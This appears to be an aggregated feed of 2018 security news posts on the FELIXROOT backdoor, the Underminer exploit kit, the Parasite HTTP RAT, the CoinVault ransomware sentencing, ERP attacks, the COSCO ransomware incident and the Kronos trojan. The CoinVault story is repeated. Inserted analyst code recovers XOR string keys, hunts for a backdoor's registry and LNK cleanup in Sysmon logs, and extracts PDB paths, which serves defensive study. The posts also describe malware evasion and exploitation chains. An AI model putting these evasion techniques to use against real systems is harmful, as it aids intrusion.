The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.”

CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

CVE-2017-11882 is a remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad range of features, including target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then checks whether it was launched by RUNDLL32.exe with parameter #1.

If it was launched by RUNDLL32.exe with parameter #1, it performs an initial system triage before connecting to the command-and-control (C2) server. The malicious code uses Windows APIs to gather system information (computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor communicates with its C2 server via HTTP and HTTPS POST requests. The traffic to the C2 is encrypted with AES and Base64-encoded.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key.”
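To make the string-obfuscation point concrete, here is an added analyst-side example (not FireEye's code, nor FELIXROOT's): since the page does not detail the "custom algorithm", it assumes the plain repeating 4-byte XOR variant and shows how the key falls out of a few bytes of known plaintext, such as the `rundll32.exe` string a loader run via RUNDLL32 would carry. The string table is constructed for the demo.

```python
"""Recovering a 4-byte repeating XOR key from an obfuscated string table.

Added example, not code from FireEye or from FELIXROOT. The page only says
strings are "encrypted using a custom algorithm that uses XOR with a 4-byte
key"; this assumes the simplest form, a repeating 4-byte key, and shows how a
few bytes of known plaintext are enough to recover it and decode everything.
"""
from itertools import cycle

KEY_LEN = 4


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The operation is symmetric: it encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(blob: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover the key from >= KEY_LEN bytes of known plaintext at blob[offset:].

    XORing ciphertext with its plaintext yields the key bytes used at those
    positions; they are then rotated so the result is aligned to blob offset 0.
    """
    if len(known_plain) < KEY_LEN:
        raise ValueError("need at least KEY_LEN bytes of known plaintext")
    frag = bytes(c ^ p for c, p in zip(blob[offset:offset + KEY_LEN], known_plain))
    shift = offset % KEY_LEN  # frag[i] is the key byte used at position offset+i
    return frag[-shift:] + frag[:-shift] if shift else frag


def decode_table(blob: bytes, key: bytes) -> list:
    """Decode the blob and split it into NUL-terminated C strings (assumed layout)."""
    plain = xor_bytes(blob, key)
    return [s.decode("latin-1") for s in plain.split(b"\x00") if s]


# Constructed sample table: the kind of strings a backdoor that is launched via
# rundll32 and fingerprints hosts with WMI would need. Not real IoCs.
SAMPLE_KEY = bytes.fromhex("5a3c9e71")
SAMPLE_PLAIN = b"rundll32.exe\x00#1\x00SELECT * FROM Win32_OperatingSystem\x00"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)


def demo() -> tuple:
    """Recover the key from two different guesses and decode the whole table."""
    # Guess 1: the table starts with the loader's "rundll32.exe" string.
    key_a = recover_key(SAMPLE_BLOB, b"rund")
    # Guess 2: a WMI class name at a non-aligned offset. The offset is taken from
    # the known layout here; an analyst would slide the guess along the blob.
    key_b = recover_key(SAMPLE_BLOB, b"Win3", SAMPLE_PLAIN.index(b"Win32"))
    assert key_a == key_b, "both known-plaintext guesses must agree on the key"
    return key_a, decode_table(SAMPLE_BLOB, key_a)


if __name__ == "__main__":
    key, strings = demo()
    print("key:", key.hex())
    for s in strings:
        print(" ", s)
```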

The experts believe that this backdoor is a dangerous threat, but at the time it was involved in massive campaigns.

The FELIXROOT backdoor supports several commands that allow it to execute specific tasks. After executing a command, the malicious code waits one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open.
  3. Deletes the dropper components from the system.
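The cleanup sequence above is also a hunting opportunity: deleting that exact registry key and a Startup shortcut back to back is unusual for legitimate software. The following added example (not FireEye's code) correlates the two deletions; it assumes a constructed, simplified pipe-delimited rendering of Sysmon Event ID 12 (registry object delete) and Event ID 23 (file delete), with made-up usernames and SIDs.

```python
r"""Hunting for the FELIXROOT-style cleanup sequence in endpoint telemetry.

Added example, not FireEye's code. The page says that once its tasks are done
the backdoor deletes its Startup LNK file, the registry key
HKCU\Software\Classes\Applications\rundll32.exe\shell\open and the dropper
components. This correlates a deletion of that key with the deletion of a .lnk
from a Startup folder inside a short window. Input is a constructed,
simplified pipe-delimited rendering of Sysmon Event ID 12 (registry object
delete) and Event ID 23 (file delete); a real pipeline would read the EVTX/XML.
"""
from datetime import datetime, timedelta
from typing import List, NamedTuple, Tuple

# Sysmon writes HKCU paths as HKU\<user SID>\..., so match on the key's suffix.
PERSISTENCE_KEY_SUFFIX = r"\software\classes\applications\rundll32.exe\shell\open"
STARTUP_DIR_MARKER = "\\start menu\\programs\\startup\\"
WINDOW = timedelta(seconds=120)  # assumed: the two deletions happen back to back


class Event(NamedTuple):
    ts: datetime
    event_id: int
    action: str
    target: str


def parse_line(line: str) -> Event:
    """Parse 'timestamp|event_id|action|target' (the constructed format)."""
    ts, eid, action, target = line.strip().split("|", 3)
    return Event(datetime.fromisoformat(ts.replace("Z", "+00:00")), int(eid), action, target)


def is_persistence_key_deletion(ev: Event) -> bool:
    return (ev.event_id == 12 and ev.action == "DeleteKey"
            and ev.target.lower().endswith(PERSISTENCE_KEY_SUFFIX))


def is_startup_lnk_deletion(ev: Event) -> bool:
    t = ev.target.lower()
    return ev.event_id == 23 and STARTUP_DIR_MARKER in t and t.endswith(".lnk")


def find_cleanup_sequences(lines) -> List[Tuple[Event, Event]]:
    """Return (key_deletion, lnk_deletion) pairs that occur within WINDOW."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts)
    key_dels = [e for e in events if is_persistence_key_deletion(e)]
    lnk_dels = [e for e in events if is_startup_lnk_deletion(e)]
    return [(k, l) for k in key_dels for l in lnk_dels if abs(l.ts - k.ts) <= WINDOW]


# Constructed telemetry: one cleanup sequence plus benign noise (a Desktop
# shortcut removed, an unrelated shell\open key deleted hours later). Usernames
# and SIDs are made up.
SAMPLE_LOG = r"""
2018-07-26T09:58:10Z|23|FileDelete|C:\Users\alice\Desktop\report.lnk
2018-07-26T10:00:00Z|12|DeleteKey|HKU\S-1-5-21-1234-5678-9012-1001\Software\Classes\Applications\rundll32.exe\shell\open
2018-07-26T10:00:02Z|23|FileDelete|C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk
2018-07-26T10:00:03Z|23|FileDelete|C:\Users\alice\AppData\Local\Temp\dropper.dll
2018-07-26T13:30:00Z|12|DeleteKey|HKU\S-1-5-21-1234-5678-9012-1001\Software\Classes\Applications\notepad.exe\shell\open
"""


if __name__ == "__main__":
    for key_ev, lnk_ev in find_cleanup_sequences(SAMPLE_LOG.splitlines()):
        print(f"possible backdoor cleanup at {key_ev.ts.isoformat()}:")
        print(f"  key deleted: {key_ev.target}")
        print(f"  LNK deleted: {lnk_ev.target}")
```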

Further details, including the IoCs, are reported in the analysis published by FireEye.

Pierluigi Paganini

(Security Affairs – FELIXROOT backdoor, malware)

The post FELIXROOT Backdoor is back in a new fresh spam campaign appeared first on Security Affairs.

Security Affairs: Underminer Exploit Kit spreading Bootkits and cryptocurrency miners

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by Trend Micro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed Underminer exploit kit activity on July 17, while it was distributing its payloads mainly to Asian countries, mostly Japan (69.75%) and Taiwan (10.52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files in a customized format similar to the ROM file system format (romfs). According to the experts, this makes the malicious code difficult to analyze.

The Underminer exploit kit appears to have been created in November 2017, when it only included code to exploit Flash vulnerabilities and used fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

  • browser profiling and filtering;
  • prevention of client revisits;
  • URL randomization;
  • asymmetric encryption of payloads.

The EK redirects visitors to a landing page that profiles them, detecting the user’s Adobe Flash Player version and browser type via the user-agent string.

If the visitor’s profile does not match that of a target of interest, the exploit kit delivers no malicious content and redirects the visitor to a clean website.

The Underminer exploit kit also sets a token in a browser cookie; if the victim has already accessed the landing page, it only returns an HTTP 404 error instead of the payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

  • CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
  • CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
  • CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.

All the above flaws have been exploited by other EKs in the past.

Below is the infection flow of Underminer’s exploits as described by Trend Micro (figure: Underminer modus operandi).

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.

Pierluigi Paganini

(Security Affairs – Underminer Exploit Kit, hacking)

The post Underminer Exploit Kit spreading Bootkits and cryptocurrency miners appeared first on Security Affairs.

Security Affairs: Twitter removed more than 143,000 apps from the messaging service

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.

Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

The social media giant has been restricting access to its application programming interfaces (APIs), which allow developers to automate interactions with the platform (e.g., posting tweets).

Spam and abuse are major problems for the platform: every day a large number of bots are used to influence sentiment on specific topics or to spread misinformation and racist content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it did not say how, and it shared no details on the revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter is a hard task. Since Tuesday, Twitter has deployed a new application process for developers who intend to use the platform’s API.

Twitter will ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.” Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service.”

Twitter messaging service

However, many legitimate applications use Twitter APIs to automate processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight spam on the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.

Pierluigi Paganini

(Security Affairs – Twitter, messaging service)

The post Twitter removed more than 143,000 apps from the messaging service appeared first on Security Affairs.

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns, has suffered a security breach and as a result, hackers have stolen more than 70 million KickCoins, worth around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]

This is a post from HackRead.com Read the original post: ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

364 inmates hacked prison tablets to steal almost $225,000

By Waqas

Hundreds of inmates hacked the system and transferred almost $225,000 into their accounts. Inmates at the Idaho Department of Correction are provided with computer tablets manufactured by JPay, a Florida-based company. These tablets are powered by communications and data services from CenturyLink, a telecommunications company headquartered in Louisiana. The purpose of these tablets is to let inmates play games, buy music and […]

This is a post from HackRead.com Read the original post: 364 inmates hacked prison tablets to steal almost $225,000

Security Affairs: Parasite HTTP RAT implements a broad range of protections and evasion mechanisms

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.

The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulated environments. It first checks whether an exception handler has run, then it checks whether between 900ms and two seconds elapsed during the routine’s 1-second sleep, which is split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint.

When it detects a sandbox, the RAT halts execution and attempts to hamper forensic investigation.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed.” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT.

The Parasite HTTP RAT is written in the C programming language. The author claims it has a small size (49kb) and no dependencies.

It also supports plugins and dynamic API calls.

Communication with the command and control (C&C) server is encrypted. The author also offers a series of plugins for the malware, including user management, browser password recovery, FTP password recovery, IM password recovery, email password recovery, Windows license key recovery, hidden VNC, and a reverse SOCKS5 proxy.

It is interesting to note that the malware uses a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints; it also removes hooks on a series of DLLs to complicate the work of malware experts investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.

Pierluigi Paganini

(Security Affairs – Parasite HTTP RAT, malware)

The post Parasite HTTP RAT implements a broad range of protections and evasion mechanisms appeared first on Security Affairs.



Security Affairs: Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

In 2015, Melvin (25) and Dennis van den B. (21) were arrested for their alleged involvement in the creation and distribution of the CoinVault ransomware; the case was heard by a district court in Rotterdam.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, making other people’s work inaccessible, and extorting 1,295 people.

“The court today sentenced two men for hacking computers and then extorting a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years.”

CoinVault ransomware was first spotted in the wild in May 2014; it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware

The two suspects are Dutch brothers and were identified, with the help of experts from Kaspersky Lab, thanks to their poor opsec. The Kaspersky experts reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.” reported Kaspersky.

The two men, who have a clean criminal record, avoided jail by cooperating with the authorities’ investigation. The court sentenced them to 240 hours of community service, the maximum term of community service a convicted person can serve.

The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

  • Ensure your system software and antivirus definitions are up-to-date.
  • Avoid visiting suspicious websites.
  • Regularly backup your important files to a separate drive or storage that are only temporarily connected.
  • Be on high alert for pop-ups, spam, and unexpected email attachments.

Pierluigi Paganini

(Security Affairs –   CoinVault Ransomware, cybercrime)

The post Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution appeared first on Security Affairs.



Security Affairs

Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

In 2015, Melvin (25) and Dennis van den B. (21) were arrested for their alleged involvement in the creation and distribution of the CoinVault ransomware; the case was tried by the district court in Rotterdam.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, making other people’s data inaccessible, and extorting 1,295 people.

“The court today sentenced two men for hacking computers and then extorting a large group of people. The suspects were 22 and 18 years old at the time. The court finds that these are very serious facts and that a substantial prison sentence is appropriate.” reads the Rechtspraak ruling.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years.”

CoinVault ransomware was first spotted in the wild in May 2014; it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server, and Kaspersky researchers released a decryption tool that allowed victims to decrypt their files for free.

The two suspects are Dutch brothers who were identified with the help of experts from Kaspersky Lab because of their poor operational security (opsec). Kaspersky reverse-engineered the malicious code written by the duo and found the full name of one of the suspects in it, as well as their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public is that in our initial blog post about CoinVault we had a screenshot with one of the suspect’s first names in the PDB path,” reported Kaspersky.
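The PDB path is the one string in a compiled Windows binary that records where on the developer’s machine the project lived, and it survives in the CodeView “RSDS” debug record even when the import table and strings have been obfuscated. The following is an added example, not Kaspersky’s tooling and not a CoinVault sample: it scans raw PE bytes for RSDS records, decodes GUID, age and path, and applies a heuristic for the account name in a default Visual Studio path. The sample bytes, the GUID and the path are constructed for the demonstration.

```python
import re
import struct
import uuid
from dataclasses import dataclass
from typing import List, Optional

# CodeView "RSDS" record, the debug-directory entry compilers write into a PE:
#   4 bytes  signature "RSDS"
#   16 bytes GUID that must match the PDB
#   4 bytes  age (uint32, little-endian)
#   N bytes  NUL-terminated PDB path, exactly as it was on the developer's machine
RSDS_MAGIC = b"RSDS"
RSDS_HEADER = struct.Struct("<16sI")


@dataclass
class PdbInfo:
    offset: int
    guid: str
    age: int
    path: str


def find_pdb_paths(blob: bytes, max_path: int = 512) -> List[PdbInfo]:
    """Scan a raw PE image (or an unpacked memory dump) for RSDS records and return the embedded PDB paths.
    Scanning by signature rather than walking the debug directory keeps this working on truncated or dumped samples."""
    found: List[PdbInfo] = []
    pos = blob.find(RSDS_MAGIC)
    while pos != -1:
        hdr_start = pos + len(RSDS_MAGIC)
        hdr_end = hdr_start + RSDS_HEADER.size
        if hdr_end <= len(blob):
            raw_guid, age = RSDS_HEADER.unpack_from(blob, hdr_start)
            nul = blob.find(b"\x00", hdr_end, hdr_end + max_path)
            path = blob[hdr_end:nul].decode("utf-8", errors="replace") if nul != -1 else ""
            # "RSDS" also shows up by chance; a real record carries a printable path ending in .pdb.
            if path and path.isprintable() and path.lower().endswith(".pdb"):
                found.append(PdbInfo(pos, str(uuid.UUID(bytes_le=raw_guid)), age, path))
        pos = blob.find(RSDS_MAGIC, pos + 1)
    return found


_USER_DIR = re.compile(r"[\\/]Users[\\/]([^\\/]+)[\\/]", re.IGNORECASE)


def profile_name_from_path(path: str) -> Optional[str]:
    """Heuristic: Visual Studio defaults to C:\\Users\\<account>\\..., so the builder's account name
    often survives in the path. That is the kind of slip the Kaspersky screenshot exposed."""
    m = _USER_DIR.search(path)
    return m.group(1) if m else None


def build_sample() -> bytes:
    """Constructed stand-in for an unpacked PE (not a CoinVault sample): junk, a false "RSDS" hit, one real record."""
    guid = uuid.UUID("12345678-1234-5678-1234-567812345678")
    record = (RSDS_MAGIC + RSDS_HEADER.pack(guid.bytes_le, 3)
              + b"C:\\Users\\devbox\\source\\repos\\locker\\Release\\locker.pdb\x00")
    return b"MZ" + b"\x90" * 64 + b"RSDS" + b"\x00" * 24 + record + b"\xcc" * 32


if __name__ == "__main__":
    for info in find_pdb_paths(build_sample()):
        print(f"@{info.offset:#x} guid={info.guid} age={info.age} path={info.path}"
              f" account={profile_name_from_path(info.path)}")
```

Run it against a packed sample and you will usually get nothing; run it against the unpacked payload or a memory dump and the path comes back. The same scan across a sample set is a cheap way to cluster builds from one developer: the GUID changes with every build, the path rarely does.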

The two men, who had a clean criminal record, avoided jail by cooperating with the investigation conducted by the authorities. The court sentenced them to 240 hours of community service, the maximum term of community service that can be imposed.

The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

  • Ensure your system software and antivirus definitions are up-to-date.
  • Avoid visiting suspicious websites.
  • Regularly back up your important files to a separate drive or storage that is only temporarily connected.
  • Be on high alert for pop-ups, spam, and unexpected email attachments.

Pierluigi Paganini

(Security Affairs –   CoinVault Ransomware, cybercrime)

The post Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution appeared first on Security Affairs.

US-CERT warns of ongoing cyber attacks aimed at ERP applications

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers to an interesting report published by Digital Shadows and Onapsis.

US-CERT warns of cyber attacks on Enterprise Resource Planning (ERP) solutions such as those from Oracle and SAP; both nation-state actors and cybercrime syndicates are carrying out hacking campaigns against these systems.

The US-CERT alert references an analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.”

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, an impressive number of systems are exposed online without the necessary security measures, and it is quite easy for attackers to find public exploits that could be used to compromise them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below are the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging and compromising these business-critical applications.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications, stealing SAP user credentials for use in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in interest in exploits for SAP applications on the Dark Web.

Attack vectors are evolving, but still mainly leverage known ERP vulnerabilities rather than zero-days.

Threat actors continue to prefer well-known vulnerabilities over zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by some of the world’s largest commercial and government organizations.

“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Leaked information from third parties and employees can expose internal ERP applications.

Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. This kind of information is a precious gift for hackers.

Experts recommend that organizations carefully review configurations for known vulnerabilities, change default passwords and enforce strong passwords for users.

Pierluigi Paganini

(Security Affairs – ERP applications, hacking)

The post US-CERT warns of ongoing cyber attacks aimed at ERP applications appeared first on Security Affairs.

The New Age of Accountability

The EU has been busy in the cybersecurity department, and for good reason. Given Europe’s ever-rising cybercrime rates, a new approach to data protection was in order. This cued the

The post The New Age of Accountability appeared first on The Cyber Security Place.

Ransomware attack disrupted some systems of the shipping giant COSCO in the US

The Chinese shipping giant COSCO was reportedly hit by a ransomware attack that affected its operations in the Americas region.

According to COSCO, a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack, quoting a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”

The shipping company quickly isolated the affected systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of its fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported that communications between the carrier’s U.S. operations and its customers had been slowed by the cyber attack. Digital communications were disrupted, and communications were being handled by telephone.

Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

According to the popular security expert Kevin Beaumont, the ransomware infected part of the infrastructure hosting the company website (cosco-usa.com), its phone and email systems, and its WAN and VPN gateways.

At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack doesn’t appear to be as severe as the NotPetya attack that hit the shipping giant Maersk in June 2017.

According to Maersk’s second quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption,” because it was forced to temporarily halt critical systems infected by the malware.

A.P. Møller-Maersk chairman Jim Hagemann Snabe, speaking at the World Economic Forum, explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Pierluigi Paganini

(Security Affairs – COSCO,  Ransomware)

The post Ransomware attack disrupted some systems of the shipping giant COSCO in the US appeared first on Security Affairs.

Kronos Banking Trojan resurrection, new campaigns spotted in the wild

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that has been involved in several attacks in recent months.

The infamous Kronos banking Trojan is back, and according to experts from Proofpoint it has been involved in several attacks in the last few months.

The malware was first spotted in 2014 by researchers at security firm Trusteer, who discovered an advertisement on the Russian underground market for a new financial Trojan dubbed Kronos.


The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variant shares many similarities with older versions:

  • Extensive code overlap
  • Same Windows API hashing technique and hashes
  • Same string encryption technique
  • Extensive string overlap
  • Same C&C encryption mechanism
  • Same C&C protocol and encryption
  • Same webinject format (Zeus format)
  • Similar C&C panel file layout

Since April 2018, experts have discovered samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is the command and control (C&C) mechanism, which now leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” continues the analysis.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

A first campaign was observed on June 27; the malware targeted German users with weaponized documents attached to spam emails. The macros included in the documents acted as a downloader for the payload, in some cases via the SmokeLoader downloader.

A second campaign was uncovered on July 13; the victims were infected through a malvertising campaign. The malicious ads pointed to a website that, thanks to JavaScript injections, redirected visitors to the RIG exploit kit, which delivered SmokeLoader. The downloader would then deliver Kronos onto the compromised machines.

